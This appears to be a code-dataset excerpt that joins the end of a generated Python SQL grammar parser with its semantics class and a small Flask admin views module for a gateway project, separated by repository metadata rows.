self._connection_name_()
self._error('expecting one of: DEFAULT')
@graken()
def _disconnect_statement_(self):
self._token('DISCONNECT')
self._disconnect_object_()
@graken()
def _disconnect_object_(self):
with self._choice():
with self._option():
self._connection_object_()
with self._option():
self._token('ALL')
with self._option():
self._token('CURRENT')
self._error('expecting one of: ALL CURRENT')
@graken()
def _set_catalog_statement_(self):
self._token('SET')
self._token('CATALOG')
self._value_specification_()
@graken()
def _set_schema_statement_(self):
self._token('SET')
self._token('SCHEMA')
self._value_specification_()
@graken()
def _set_names_statement_(self):
self._token('SET')
self._token('NAMES')
self._value_specification_()
@graken()
def _set_session_authorization_identifier_statement_(self):
self._token('SET')
self._token('SESSION')
self._token('AUTHORIZATION')
self._value_specification_()
@graken()
def _set_local_time_zone_statement_(self):
self._token('SET')
self._token('TIME')
self._token('ZONE')
self._set_time_zone_value_()
@graken()
def _set_time_zone_value_(self):
with self._choice():
with self._option():
self._interval_value_expression_()
with self._option():
self._token('LOCAL')
self._error('expecting one of: LOCAL')
@graken()
def _direct_sql_statement_(self):
self._directly_executable_statement_()
self._semicolon_()
@graken()
def _directly_executable_statement_(self):
with self._choice():
with self._option():
self._direct_sql_data_statement_()
with self._option():
self._sql_schema_statement_()
with self._option():
self._sql_transaction_statement_()
with self._option():
self._sql_connection_statement_()
with self._option():
self._sql_session_statement_()
self._error('no available options')
@graken()
def _direct_sql_data_statement_(self):
with self._choice():
with self._option():
self._delete_statement_searched_()
with self._option():
self._direct_select_statement_multiple_rows_()
with self._option():
self._insert_statement_()
with self._option():
self._update_statement_searched_()
with self._option():
self._temporary_table_declaration_()
self._error('no available options')
@graken()
def _direct_select_statement_multiple_rows_(self):
self._query_expression_()
with self._optional():
self._order_by_clause_()
@graken()
def _start_(self):
self._direct_sql_statement_()
self._check_eof()
class SqlSemantics(object):
def digit(self, ast):
return ast
def double_quote(self, ast):
return ast
def quote(self, ast):
return ast
def left_paren(self, ast):
return ast
def right_paren(self, ast):
return ast
def asterisk(self, ast):
return ast
def plus_sign(self, ast):
return ast
def comma(self, ast):
return ast
def minus_sign(self, ast):
return ast
def period(self, ast):
return ast
def solidus(self, ast):
return ast
def colon(self, ast):
return ast
def semicolon(self, ast):
return ast
def less_than_operator(self, ast):
return ast
def equals_operator(self, ast):
return ast
def greater_than_operator(self, ast):
return ast
def question_mark(self, ast):
return ast
def underscore(self, ast):
return ast
def regular_identifier(self, ast):
return ast
def delimited_identifier(self, ast):
return ast
def delimited_identifier_body(self, ast):
return ast
def not_equals_operator(self, ast):
return ast
def greater_than_or_equals_operator(self, ast):
return ast
def less_than_or_equals_operator(self, ast):
return ast
def concatenation_operator(self, ast):
return ast
def literal(self, ast):
return ast
def unsigned_literal(self, ast):
return ast
def general_literal(self, ast):
return ast
def character_string_literal(self, ast):
return ast
def character_representation(self, ast):
return ast
def national_character_string_literal(self, ast):
return ast
def bit_string_literal(self, ast):
return ast
def hex_string_literal(self, ast):
return ast
def bit(self, ast):
return ast
def hexit(self, ast):
return ast
def signed_numeric_literal(self, ast):
return ast
def unsigned_numeric_literal(self, ast):
return ast
def exact_numeric_literal(self, ast):
return ast
def sign(self, ast):
return ast
def approximate_numeric_literal(self, ast):
return ast
def signed_integer(self, ast):
return ast
def unsigned_integer(self, ast):
return ast
def datetime_literal(self, ast):
return ast
def date_literal(self, ast):
return ast
def time_literal(self, ast):
return ast
def timestamp_literal(self, ast):
return ast
def date_string(self, ast):
return ast
def time_string(self, ast):
return ast
def timestamp_string(self, ast):
return ast
def time_zone_interval(self, ast):
return ast
def date_value(self, ast):
return ast
def time_value(self, ast):
return ast
def interval_literal(self, ast):
return ast
def interval_string(self, ast):
return ast
def year_month_literal(self, ast):
return ast
def day_time_literal(self, ast):
return ast
def day_time_interval(self, ast):
return ast
def time_interval(self, ast):
return ast
def years_value(self, ast):
return ast
def months_value(self, ast):
return ast
def days_value(self, ast):
return ast
def hours_value(self, ast):
return ast
def minutes_value(self, ast):
return ast
def seconds_value(self, ast):
return ast
def datetime_value(self, ast):
return ast
def identifier(self, ast):
return ast
def identifier_list(self, ast):
return ast
def actual_identifier(self, ast):
return ast
def table_name(self, ast):
return ast
def qualified_local_table_name(self, ast):
return ast
def schema_name(self, ast):
return ast
def schema_qualified_name(self, ast):
return ast
def parameter_name(self, ast):
return ast
def character_set_name(self, ast):
return ast
def connection_name(self, ast):
return ast
def data_type(self, ast):
return ast
def character_string_type(self, ast):
return ast
def national_character_string_type(self, ast):
return ast
def bit_string_type(self, ast):
return ast
def numeric_type(self, ast):
return ast
def exact_numeric_type(self, ast):
return ast
def approximate_numeric_type(self, ast):
return ast
def length(self, ast):
return ast
def precision(self, ast):
return ast
def scale(self, ast):
return ast
def datetime_type(self, ast):
return ast
def interval_type(self, ast):
return ast
def value_specification(self, ast):
return ast
def unsigned_value_specification(self, ast):
return ast
def general_value_specification(self, ast):
return ast
def simple_value_specification(self, ast):
return ast
def parameter_specification(self, ast):
return ast
def indicator_parameter(self, ast):
return ast
def table_reference(self, ast):
return ast
def column_name_list(self, ast):
return ast
def column_reference(self, ast):
return ast
def qualifier(self, ast):
return ast
def set_function_specification(self, ast):
return ast
def general_set_function(self, ast):
return ast
def set_function_type(self, ast):
return ast
def set_quantifier(self, ast):
return ast
def numeric_value_function(self, ast):
return ast
def position_expression(self, ast):
return ast
def length_expression(self, ast):
return ast
def char_length_expression(self, ast):
return ast
def octet_length_expression(self, ast):
return ast
def bit_length_expression(self, ast):
return ast
def extract_expression(self, ast):
return ast
def extract_field(self, ast):
return ast
def time_zone_field(self, ast):
return ast
def extract_source(self, ast):
return ast
def string_value_function(self, ast):
return ast
def character_value_function(self, ast):
return ast
def character_substring_function(self, ast):
return ast
def fold(self, ast):
return ast
def form_of_use_conversion(self, ast):
return ast
def character_translation(self, ast):
return ast
def trim_function(self, ast):
return ast
def trim_operands(self, ast):
return ast
def trim_specification(self, ast):
return ast
def bit_substring_function(self, ast):
return ast
def start_position(self, ast):
return ast
def string_length(self, ast):
return ast
def datetime_value_function(self, ast):
return ast
def current_time_value_function(self, ast):
return ast
def current_timestamp_value_function(self, ast):
return ast
def case_expression(self, ast):
return ast
def case_abbreviation(self, ast):
return ast
def case_specification(self, ast):
return ast
def simple_case(self, ast):
return ast
def searched_case(self, ast):
return ast
def simple_when_clause(self, ast):
return ast
def searched_when_clause(self, ast):
return ast
def else_clause(self, ast):
return ast
def result(self, ast):
return ast
def cast_specification(self, ast):
return ast
def cast_operand(self, ast):
return ast
def cast_target(self, ast):
return ast
def value_expression(self, ast):
return ast
def value_expression_primary(self, ast):
return ast
def numeric_value_expression(self, ast):
return ast
def term(self, ast):
return ast
def factor(self, ast):
return ast
def numeric_primary(self, ast):
return ast
def string_value_expression(self, ast):
return ast
def character_value_expression(self, ast):
return ast
def concatenation(self, ast):
return ast
def character_factor(self, ast):
return ast
def character_primary(self, ast):
return ast
def bit_value_expression(self, ast):
return ast
def bit_concatenation(self, ast):
return ast
def bit_factor(self, ast):
return ast
def bit_primary(self, ast):
return ast
def datetime_value_expression(self, ast):
return ast
def datetime_term(self, ast):
return ast
def datetime_factor(self, ast):
return ast
def datetime_primary(self, ast):
return ast
def time_zone(self, ast):
return ast
def time_zone_specifier(self, ast):
return ast
def interval_value_expression(self, ast):
return ast
def interval_term(self, ast):
return ast
def interval_factor(self, ast):
return ast
def interval_primary(self, ast):
return ast
def interval_value_expression_1(self, ast):
return ast
def interval_term_1(self, ast):
return ast
def interval_term_2(self, ast):
return ast
def row_value_constructor(self, ast):
return ast
def row_value_constructor_list(self, ast):
return ast
def row_value_constructor_element(self, ast):
return ast
def table_value_constructor(self, ast):
return ast
def table_value_constructor_list(self, ast):
return ast
def table_expression(self, ast):
return ast
def from_clause(self, ast):
return ast
def joined_table(self, ast):
return ast
def cross_join(self, ast):
return ast
def qualified_join(self, ast):
return ast
def join_specification(self, ast):
return ast
def join_condition(self, ast):
return ast
def named_columns_join(self, ast):
return ast
def join_type(self, ast):
return ast
def outer_join_type(self, ast):
return ast
def where_clause(self, ast):
return ast
def group_by_clause(self, ast):
return ast
def grouping_column_reference_list(self, ast):
return ast
def grouping_column_reference(self, ast):
return ast
def having_clause(self, ast):
return ast
def query_specification(self, ast):
return ast
def select_list(self, ast):
return ast
def select_sublist(self, ast):
return ast
def derived_column(self, ast):
return ast
def as_clause(self, ast):
return ast
def query_expression(self, ast):
return ast
def non_join_query_expression(self, ast):
return ast
def query_term(self, ast):
return ast
def non_join_query_term(self, ast):
return ast
def query_primary(self, ast):
return ast
def non_join_query_primary(self, ast):
return ast
def simple_table(self, ast):
return ast
def explicit_table(self, ast):
return ast
def corresponding_spec(self, ast):
return ast
def subquery(self, ast):
return ast
def predicate(self, ast):
return ast
def comparison_predicate(self, ast):
return ast
def comp_op(self, ast):
return ast
def between_predicate(self, ast):
return ast
def in_predicate(self, ast):
return ast
def in_predicate_value(self, ast):
return ast
def in_value_list(self, ast):
return ast
def like_predicate(self, ast):
return ast
def null_predicate(self, ast):
return ast
def quantified_comparison_predicate(self, ast):
return ast
def quantifier(self, ast):
return ast
def some(self, ast):
return ast
def exists_predicate(self, ast):
return ast
def unique_predicate(self, ast):
return ast
def match_predicate(self, ast):
return ast
def overlaps_predicate(self, ast):
return ast
def search_condition(self, ast):
return ast
def boolean_term(self, ast):
return ast
def boolean_factor(self, ast):
return ast
def boolean_test(self, ast):
return ast
def truth_value(self, ast):
return ast
def boolean_primary(self, ast):
return ast
def interval_qualifier(self, ast):
return ast
def start_field(self, ast):
return ast
def end_field(self, ast):
return ast
def single_datetime_field(self, ast):
return ast
def datetime_field(self, ast):
return ast
def non_second_datetime_field(self, ast):
return ast
def privileges(self, ast):
return ast
def action_list(self, ast):
return ast
def action(self, ast):
return ast
def grantee(self, ast):
return ast
def collate_clause(self, ast):
return ast
def constraint_name_definition(self, ast):
return ast
def constraint_attributes(self, ast):
return ast
def constraint_check_time(self, ast):
return ast
def schema_definition(self, ast):
return ast
def schema_name_clause(self, ast):
return ast
def schema_character_set_specification(self, ast):
return ast
def schema_element(self, ast):
return ast
def drop_schema_statement(self, ast):
return ast
def drop_behavior(self, ast):
return ast
def table_definition(self, ast):
return ast
def table_element_list(self, ast):
return ast
def table_element(self, ast):
return ast
def column_definition(self, ast):
return ast
def column_constraint_definition(self, ast):
return ast
def column_constraint(self, ast):
return ast
def default_clause(self, ast):
return ast
def default_option(self, ast):
return ast
def table_constraint_definition(self, ast):
return ast
def table_constraint(self, ast):
return ast
def unique_constraint_definition(self, ast):
return ast
def unique_specification(self, ast):
return ast
def referential_constraint_definition(self, ast):
return ast
def references_specification(self, ast):
return ast
def match_type(self, ast):
return ast
def referenced_table_and_columns(self, ast):
return ast
def referential_triggered_action(self, ast):
return ast
def update_rule(self, ast):
return ast
def delete_rule(self, ast):
return ast
def referential_action(self, ast):
return ast
def check_constraint_definition(self, ast):
return ast
def alter_table_statement(self, ast):
return ast
def alter_table_action(self, ast):
return ast
def add_column_definition(self, ast):
return ast
def alter_column_definition(self, ast):
return ast
def alter_column_action(self, ast):
return ast
def set_column_default_clause(self, ast):
return ast
def drop_column_default_clause(self, ast):
return ast
def drop_column_definition(self, ast):
return ast
def add_table_constraint_definition(self, ast):
return ast
def drop_table_constraint_definition(self, ast):
return ast
def drop_table_statement(self, ast):
return ast
def view_definition(self, ast):
return ast
def levels_clause(self, ast):
return ast
def drop_view_statement(self, ast):
return ast
def domain_definition(self, ast):
return ast
def domain_constraint(self, ast):
return ast
def alter_domain_statement(self, ast):
return ast
def alter_domain_action(self, ast):
return ast
def set_domain_default_clause(self, ast):
return ast
def drop_domain_default_clause(self, ast):
return ast
def add_domain_constraint_definition(self, ast):
return ast
def drop_domain_constraint_definition(self, ast):
return ast
def drop_domain_statement(self, ast):
return ast
def character_set_definition(self, ast):
return ast
def character_set_source(self, ast):
return ast
def limited_collation_definition(self, ast):
return ast
def drop_character_set_statement(self, ast):
return ast
def collation_definition(self, ast):
return ast
def pad_attribute(self, ast):
return ast
def collation_source(self, ast):
return ast
def collating_sequence_definition(self, ast):
return ast
def translation_collation(self, ast):
return ast
def external_collation(self, ast):
return ast
def drop_collation_statement(self, ast):
return ast
def translation_definition(self, ast):
return ast
def translation_specification(self, ast):
return ast
def external_translation(self, ast):
return ast
def drop_translation_statement(self, ast):
return ast
def assertion_definition(self, ast):
return ast
def assertion_check(self, ast):
return ast
def drop_assertion_statement(self, ast):
return ast
def grant_statement(self, ast):
return ast
def object_name(self, ast):
return ast
def revoke_statement(self, ast):
return ast
def sql_schema_statement(self, ast):
return ast
def sql_schema_definition_statement(self, ast):
return ast
def sql_schema_manipulation_statement(self, ast):
return ast
def sql_transaction_statement(self, ast):
return ast
def sql_connection_statement(self, ast):
return ast
def sql_session_statement(self, ast):
return ast
def order_by_clause(self, ast):
return ast
def sort_specification_list(self, ast):
return ast
def sort_specification(self, ast):
return ast
def sort_key(self, ast):
return ast
def ordering_specification(self, ast):
return ast
def delete_statement_searched(self, ast):
return ast
def insert_statement(self, ast):
return ast
def insert_columns_and_source(self, ast):
return ast
def set_clause_list(self, ast):
return ast
def set_clause(self, ast):
return ast
def update_source(self, ast):
return ast
def update_statement_searched(self, ast):
return ast
def temporary_table_declaration(self, ast):
return ast
def set_transaction_statement(self, ast):
return ast
def transaction_mode(self, ast):
return ast
def transaction_access_mode(self, ast):
return ast
def isolation_level(self, ast):
return ast
def level_of_isolation(self, ast):
return ast
def diagnostics_size(self, ast):
return ast
def set_constraints_mode_statement(self, ast):
return ast
def constraint_name_list(self, ast):
return ast
def commit_statement(self, ast):
return ast
def rollback_statement(self, ast):
return ast
def connect_statement(self, ast):
return ast
def connection_target(self, ast):
return ast
def set_connection_statement(self, ast):
return ast
def connection_object(self, ast):
return ast
def disconnect_statement(self, ast):
return ast
def disconnect_object(self, ast):
return ast
def set_catalog_statement(self, ast):
return ast
def set_schema_statement(self, ast):
return ast
def set_names_statement(self, ast):
return ast
def set_session_authorization_identifier_statement(self, ast):
return ast
def set_local_time_zone_statement(self, ast):
return ast
def set_time_zone_value(self, ast):
return ast
def direct_sql_statement(self, ast):
return ast
def directly_executable_statement(self, ast):
return ast
def direct_sql_data_statement(self, ast):
return ast
def direct_select_statement_multiple_rows(self, ast):
return ast
def start(self, ast):
return ast
def main(
filename,
startrule,
trace=False,
whitespace=None,
nameguard=None,
comments_re='/\\*[\\s\\S]*?\\*/',
eol_comments_re='--.*?$',
ignorecase=True,
left_recursion=True,
**kwargs):
with open(filename) as f:
text = f.read()
whitespace = whitespace or '\\s+'
parser = SqlParser(parseinfo=False)
ast = parser.parse(
text,
startrule,
filename=filename,
trace=trace,
whitespace=whitespace,
nameguard=nameguard,
ignorecase=ignorecase,
**kwargs)
return ast
if __name__ == '__main__':
import json
ast = generic_main(main, SqlParser, name='Sql')
print('AST:')
print(ast)
print()
print('JSON:')
print(json.dumps(ast, indent=2))
print()
|
mit
| 5,738,808,319,765,428,000
| 26.315351
| 93
| 0.502264
| false
| 4.589293
| false
| false
| false
|
procool/mygw
|
web/apps/admin/views.py
|
1
|
1195
|
import logging
import datetime
from sqlalchemy import func, and_, or_, not_
from flask import url_for, session
from misc.mixins import myTemplateView, JSONView
from utils.arp_list import get_mac_by_ip
from models.all_models import InetEther
from models.session import session
from utils.server.http_client import HTTPClient
from libs.pfctl import PFCtl
from auth import LoginRequiredMixin, LoginRequiredRedirectMixin
class adminView(LoginRequiredMixin, myTemplateView):
template='admin/admin-ajax.tpl'
class statusView(LoginRequiredMixin, myTemplateView):
template='admin/status-ajax.tpl'
class shutdownView(LoginRequiredMixin, JSONView):
__ctlsrv = HTTPClient(port=6999)
def get_context_data(self, **kwargs):
context = super(shutdownView, self).get_context_data(**kwargs)
cmd = self.__cmd == 'poweroff' and 'poweroff' or 'reboot'
r = self.__ctlsrv.call_handler('system/%s' % cmd)
context['result'] = r
return context
def dispatch(self, request, command, *args, **kwargs):
self.__cmd = command.lower()
return super(shutdownView, self).dispatch(self, request, *args, **kwargs)
|
bsd-2-clause
| 7,223,317,303,329,078,000
| 28.146341
| 81
| 0.706276
| false
| 3.757862
| false
| false
| false
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.